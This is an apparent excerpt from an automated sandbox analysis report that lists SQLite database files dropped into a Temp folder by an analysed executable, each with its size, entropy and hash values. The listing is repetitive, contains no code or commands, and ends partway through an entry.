                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jOHcEeG3Vg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jcZS6RvkWn

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jfB2PbZ54N

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jga3WRorVG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\jiRBJArjTi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\k4zOUIDNOY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\k6j35uLfyT

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\k7HQdeMU44

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kNOWAAopcV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kUo72u6N5N

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kaX3DZz2Mg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kldWpPONz0

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ksvbOxkt2o

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kvJF9vfygu

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kxIwIRyEwM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\kyqfgWzbHC

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\l0MWygAcnp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lCd10Cnu1w

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lJJPZTgsJv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ldzA3IvYtO

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lhRUDUZuxF

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\loq8wzZiPw

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lyKuUDl44z

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\lyckcXPPLY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
